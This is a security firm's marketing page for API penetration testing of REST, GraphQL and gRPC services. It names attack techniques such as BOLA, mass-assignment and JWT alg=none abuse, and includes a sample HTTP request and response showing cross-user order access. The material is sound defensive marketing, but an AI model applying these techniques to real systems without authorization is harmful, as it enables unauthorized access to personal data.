CSI Cyber Security Awards 2025 — Women in Cyber + Outstanding Training
Macksofy Technologies
OWASP API Top 10 · REST · GraphQL · gRPC

API Security Testing — REST, GraphQL, gRPC.

Dedicated API security testing for REST, GraphQL and gRPC surfaces. BOLA, BFLA, mass-assignment, JWT and OAuth server-side flows, rate-limit and resource-consumption abuse, GraphQL introspection and depth attacks — by OSWE-certified consultants who treat the API as the product, not the website’s backend.

Request a quoteSee OWASP API coverage
Download sample API pentest report
OWASP API Top 10 attestation

REST / OpenAPI

Postman · Swagger · OAS 3

GraphQL

Apollo · Hasura · field-authz

gRPC + Protobuf

grpcurl · grpcui · reflection

Auth schemes

OAuth · JWT · mTLS · HMAC

Why API testing is its own discipline

The breach is below the login form.

Web tests look at what a browser does. API tests look at what every client (mobile app, SPA, partner integration, bot) does. That’s a different attack surface and a different test method. BOLA across tenants. Mass-assignment that promotes a regular user to admin. JWT signing flaws. OAuth state omissions. GraphQL alias overloads. These bugs don’t show up in a browser screenshot — they show up in the response body.

  • BOLA / IDOR across multi-tenant flows
  • Mass-assignment via PATCH / PUT bodies
  • JWT alg=none, alg confusion, kid injection
  • GraphQL introspection abuse + depth attacks
  • Shadow APIs and abandoned v1/v2 endpoints
requestburp · attacker-tab
GET /api/v1/orders/4815 HTTP/1.1
Host: api.target.com
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9…
X-User-Id: 2911 ← attacker
Accept: application/json
Cookie: session=…
attacker requesting another user’s order
response200 OK
{
"order_id": 4815,
"customer_id": 2911 ← belongs to OTHER user
"amount": "₹ 4,82,000",
"pii": { name, addr, pan, phone }
}
BOLA confirmed · CVSS 9.1 · CWE-639
requestattacker substitutes IDcross-tenant data leak
Testing methodology

Six phases. Spec to attestation.

A Macksofy API engagement walks the OWASP API Security Top 10 from first request to regulator-ready attestation. Each phase puts BOLA, BFLA, mass-assignment, JWT abuse and resource- consumption tradecraft against your endpoints — with a consultant typing the exploit, not a tool clicking through a YAML config. Findings cross-reference across phases (a shadow endpoint surfaced in Phase 2 becomes a mass-assignment vector in Phase 4, which unlocks a role-elevation chain in Phase 3) so the deliverable reads like an attacker’s logbook, not a scanner export. Every report ships with a Postman / OpenAPI regression suite your CI can re-execute on the next release.

OWASP API Top 10 · 2023Postman regression suiteCERT-In formatRBI · SEBI · DPDP mapping
API pentest · Start
  1. Phase 01

    1 · API inventory & scoping

    • REST + GraphQL + gRPC endpoint inventory from spec, traffic and disassembly
    • Authentication scheme map — Bearer, OAuth, JWT, mTLS, HMAC, session
    • User-role + tenant-isolation model agreement
    01
    Phase 01

    1 · API inventory & scoping

    • REST + GraphQL + gRPC endpoint inventory from spec, traffic and disassembly
    • Authentication scheme map — Bearer, OAuth, JWT, mTLS, HMAC, session
    • User-role + tenant-isolation model agreement
  2. Phase 02

    2 · Discovery + shadow-API hunt

    • OpenAPI / Postman / swagger parse
    • Endpoint fuzzing (ffuf, kiterunner) for undocumented routes
    • Old API-version (v1, v2, beta) abandoned-but-live discovery
    02
    Phase 02

    2 · Discovery + shadow-API hunt

    • OpenAPI / Postman / swagger parse
    • Endpoint fuzzing (ffuf, kiterunner) for undocumented routes
    • Old API-version (v1, v2, beta) abandoned-but-live discovery
  3. Phase 03

    3 · Auth at the API layer

    • BOLA + BFLA across roles and tenants
    • JWT alg confusion, alg=none, kid injection, signing-key abuse
    • OAuth flow abuse — state, PKCE, redirect-URI confusion server-side
    03
    Phase 03

    3 · Auth at the API layer

    • BOLA + BFLA across roles and tenants
    • JWT alg confusion, alg=none, kid injection, signing-key abuse
    • OAuth flow abuse — state, PKCE, redirect-URI confusion server-side
  4. Phase 04

    4 · Object + property level testing

    • Mass-assignment via PUT / PATCH bodies
    • Property-level read/write authorization bypass
    • GraphQL field-level authz, introspection abuse, batching attacks
    04
    Phase 04

    4 · Object + property level testing

    • Mass-assignment via PUT / PATCH bodies
    • Property-level read/write authorization bypass
    • GraphQL field-level authz, introspection abuse, batching attacks
  5. Phase 05

    5 · Resource consumption + abuse

    • Rate-limit and quota bypass
    • GraphQL depth, complexity and alias attacks
    • Bulk endpoint + business-flow abuse (signup, password reset, OTP)
    05
    Phase 05

    5 · Resource consumption + abuse

    • Rate-limit and quota bypass
    • GraphQL depth, complexity and alias attacks
    • Bulk endpoint + business-flow abuse (signup, password reset, OTP)
  6. Phase 06

    6 · Reporting + retest

    • OWASP API Top 10 attestation + per-finding PoC
    • Postman / OpenAPI test collection so dev can re-validate
    • CVSS 3.1 scoring + free retest within 30 days
    06
    Phase 06

    6 · Reporting + retest

    • OWASP API Top 10 attestation + per-finding PoC
    • Postman / OpenAPI test collection so dev can re-validate
    • CVSS 3.1 scoring + free retest within 30 days
Closure + retest
OWASP API Security Top 10 · 2023

Tap a category. See manual vs scanner coverage.

Side-by-side coverage delta per OWASP API category. The gap between the two bars is the work that justifies hiring a consultant instead of buying a subscription.

API1OWASP API Security Top 10 · 2023

BOLA

Object-level authz bypass via swapped IDs — cross-tenant data leaks

Manual coverage96%
Scanner coverage12%

Coverage % per Macksofy 2025 API engagement telemetry. The scanner-shop gap is the work humans do.

Case studies

What we found in production APIs.

B2B SaaS (Series-B, India)

Multi-tenant SaaS REST + GraphQL API

Finding · BOLA across tenants via tenant-id header swap → cross-tenant data exposure

Critical — fixed pre enterprise contract signing

Risk severity · Critical
LMHC
Healthcare API (UAE)

Patient portal FHIR API

Finding · JWT alg=none accepted; account takeover at scale

Critical — fixed within 24 hours of report delivery

Risk severity · Critical
LMHC
Open-banking aggregator (India)

Account aggregator REST API + OAuth flow

Finding · Mass-assignment via PATCH /accounts → arbitrary role elevation

Critical — fixed pre RBI System Audit

Risk severity · Critical
LMHC
Why Macksofy for API security

The API pentest your scanner can’t run.

Generic API scanners run a corpus of known payloads against the routes they can already see. The findings that actually close a regulator audit — BOLA across tenants, mass-assignment that elevates a regular user to admin, JWT alg=none accepted in production — come from a human who reasoned about your authorisation model, not from a tool that pattern-matched your response bodies.

We break the auth model first.

JWT alg confusion, kid injection, OAuth state omissions, mTLS misuse, HMAC replay — every auth scheme on your stack gets its own phase, not a check-box. Our OSWE-trained team has shipped CVEs against well-known auth libraries. If the auth holds, the rest of the engagement gets cheaper.

We hunt the APIs you forgot you shipped.

Old v1, v2 and beta routes still answering traffic. Admin paths discoverable from a JS bundle. Partner-only endpoints reachable from the internet. Shadow-API discovery is its own phase, with kiterunner, ffuf and live traffic-capture run in parallel.

REST, GraphQL, gRPC — all three.

REST + OpenAPI, GraphQL (Apollo, Hasura, federated), gRPC + Protobuf with reflection, server-sent events, websockets. We test the protocols your app actually emits, not the subset the scanner happens to support.

We attack the property, not just the endpoint.

Mass-assignment via PATCH and PUT bodies. GraphQL field-level authz across roles. Partial-update body abuse. We find the property your back-end forgot to filter, then prove the role-elevation chain it unlocks.

OWASP API Top 10 attestation, on paper.

Explicit per-category attestation against the 2023 OWASP API Security Top 10, plus a Postman / OpenAPI regression collection your CI can re-execute on every release. Your auditor reads “L1 verified”, not “OWASP-aligned”.

Free retest. Closed, not pending.

One free verification cycle within 30 days of developer sign-off. We rerun the affected phases on the patched build, re-execute the Postman regression, and reissue the attestation — so the auditor sees ‘closed’, never ‘remediation pending’.

Mutual NDA is step zero of every engagement. Specs, traffic captures and findings live on Macksofy infrastructure for the engagement window plus 90 days, then are securely destroyed against a CERT-In-acceptable retention policy.

Talk to an API lead
Toolchain

Burp + Postman + custom Burp extensions.

We ship Burp extensions for GraphQL recon, JWT abuse, BOLA scanning and gRPC introspection that aren’t on the BApp store — built from years of running this engagement against multi-tenant fintech and SaaS targets.

Tools we operate
Burp Suite ProCaidoPostman + Newmanffufkiterunner (API route fuzzing)GraphQL VoyagerInQL (GraphQL recon)JWT_toolgrpcurl + grpcuiCustom Burp extensions
What clients say · Trusted India + UAE

Rated 4.9 ★ from 612 client reviews.

Google
4.9 · 612 reviews
Trustpilot
4.8 · 412 reviews
LinkedIn
20K+ · followers
CERT-In Empanelled
Govt of India · MeitY
EC-Council ATC
Authorized Training
ISO 27001 Certified
Info Security Mgmt
We've worked with three Big 4 firms before Macksofy. None found what their team did in our payments stack. The most actionable report we've received in a decade.
AK
Aisha Khan
Information Security Manager · Listed Fintech · BKC, Mumbai
The CHFI training Macksofy delivered for our cyber cell raised investigation quality measurably. Practical, India-context-aware, and respectful of our operational realities.
IK
Inspector K. Joshi
Cyber Cell · Maharashtra Police · Mumbai
Came in with zero security background. 5 weeks later I was running Burp Suite and Metasploit confidently. Cleared CEH on the first attempt.
VI
Vivek Iyer
DevSecOps Lead · Healthcare SaaS · Hyderabad
Read all 612 reviews on Google →
FAQ

Things people ask before signing.

Extensively. Introspection abuse, depth and complexity attacks, batching, alias overloading, and field-level authorization issues that REST-trained testers miss are a dedicated track in every GraphQL engagement.
Talk to us

Get a fixed-price proposal in 48 hours.

Tell us about your security need — pentest, audit, training or a wider engagement. A senior consultant will reply within a few business hours.

CERT-In Empanelled
Information Security Auditor · India
  • CERT-In Empanelled
  • EC-Council ATC · CompTIA Authorized
  • 20,000+ professionals trained
  • India + UAE engagements
Human verification· Cloudflare Turnstile

By submitting this form you agree to be contacted by Macksofy. We typically respond within a few business hours and never share your details. Protected by Cloudflare Turnstile and rate limiting.